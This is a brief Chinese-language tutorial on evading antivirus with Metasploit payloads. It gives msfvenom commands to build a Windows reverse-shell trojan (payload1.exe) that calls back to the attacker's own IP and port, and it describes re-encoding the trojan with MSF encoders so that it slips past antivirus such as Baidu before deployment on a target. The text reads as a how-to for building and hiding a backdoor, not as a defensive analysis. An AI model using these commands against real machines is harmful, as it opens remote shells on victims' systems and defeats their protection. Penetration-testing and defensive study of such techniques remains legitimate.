攻击载荷免杀技术
大多数杀毒软件使用特征码来识别恶意代码。特征码在杀毒引擎中,对磁盘和进程进行扫描匹配。 为了避开杀毒软件,可以针对特征码创建一个独一无二的攻击载荷,它不与杀毒软件的任何特征码匹配。 当直接渗透时,metasploit的攻击载荷可以只在内存中运行,不将任何数据写入到硬盘上,我们发起攻击并上传攻击载荷后,大多数杀毒软件都无法检测出来。 1.使用MSF攻击载荷生成器创建可独立运行的木马 两条命令搞定 msfvenom -p windows/shell_reverse_tcp --payload-options msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140(自己的IP)LPORT=31337(自己的端口)-f -exe -o payload1.exe 一个windows PE文件(便携可执行文件) 木马 2.躲避杀毒软件的检测 最佳方法之一,使用MSF编码器 以百度杀毒为例子。在目标上实际部署攻击载荷前,需要弄清目标的反病毒方案,确保木马顺利运行 使用MSF编码器,对木马文件进行重新编码。它能改变可执行文件中的代码形状。和电子邮件附件base64编码类似。 当这个文件运行后,MSF编码器会将原始程序解码到内存中并执行。 msfvenom -l encoders 选择不同环境(比如x86,linux,PPC等)的编码格式